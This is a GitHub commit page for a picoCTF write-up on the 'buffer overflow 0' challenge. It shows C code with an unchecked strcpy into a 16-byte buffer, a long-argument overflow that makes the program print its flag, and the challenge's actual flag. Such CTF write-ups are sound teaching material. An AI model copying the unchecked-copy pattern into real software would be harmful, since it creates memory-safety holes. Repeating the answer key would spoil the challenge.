Skip to content

Commit fc53dc6

Browse files
PlatyPewPlatyPew
committed
Updated buffer overflow 0
1 parent a3d3e6d commit fc53dc6

File tree

3 files changed

+67
-2
lines changed

3 files changed

+67
-2
lines changed

Binary Exploitation/buffer overflow 0/README.md

+66-2
Original file line numberDiff line numberDiff line change
@@ -13,9 +13,73 @@ Binary Exploitation
1313
>If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
1414
1515
## Solution
16-
Simple buffer overflow question
16+
We can try pwning the binary locally first. Firstly, create a file _flag.txt_ and add some contents into it.
1717

18-
Working solution [solve.sh](solution/solve.py)
18+
Do a sample run of the program.
19+
20+
```
21+
$ ./vuln
22+
This program takes 1 argument.
23+
```
24+
25+
Ok, now we try with an argument
26+
27+
```
28+
$ ./vuln AAAA
29+
Thanks! Received: AAAA
30+
```
31+
32+
Seems like it's redirecting the input into output. Let's take a look at the source code.
33+
34+
```c
35+
// Imports here...
36+
// Define flag size here...
37+
void sigsegv_handler(int sig) {
38+
fprintf(stderr, "%s\n", flag);
39+
fflush(stderr);
40+
exit(1);
41+
}
42+
43+
void vuln(char *input){
44+
char buf[16];
45+
strcpy(buf, input);
46+
}
47+
48+
int main(int argc, char **argv){
49+
// Reading flag here...
50+
signal(SIGSEGV, sigsegv_handler);
51+
// gid settings here...
52+
if (argc > 1) {
53+
vuln(argv[1]);
54+
printf("Thanks! Received: %s", argv[1]);
55+
}
56+
else
57+
printf("This program takes 1 argument.\n");
58+
return 0;
59+
}
60+
```
61+
62+
It looks like the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()` and prints the flag.
63+
64+
In `vuln()`, there is no boundary checking, so even though there is only space for 16 bytes, it `strcpy()` will keep inserting bytes into `buf`.
65+
66+
We can try running the program again, but this time, with a lot more characters.
67+
68+
```
69+
$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
70+
picoCTF{sample_flag}
71+
```
72+
73+
We did it locally! It takes 28 or more bytes to leak out the flag.
74+
75+
All we have to do is send it to the webshell.
76+
77+
```
78+
$ /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
79+
picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}
80+
```
81+
82+
Working solution [solve.py](solution/solve.py)
1983
2084
### Flag
2185
`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`

Binary Exploitation/buffer overflow 0/solution/flag.txt

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
picoCTF{sample_flag}

Binary Exploitation/buffer overflow 0/solution/vuln

7.64 KB
Binary file not shown.

0 commit comments

Comments
 (0)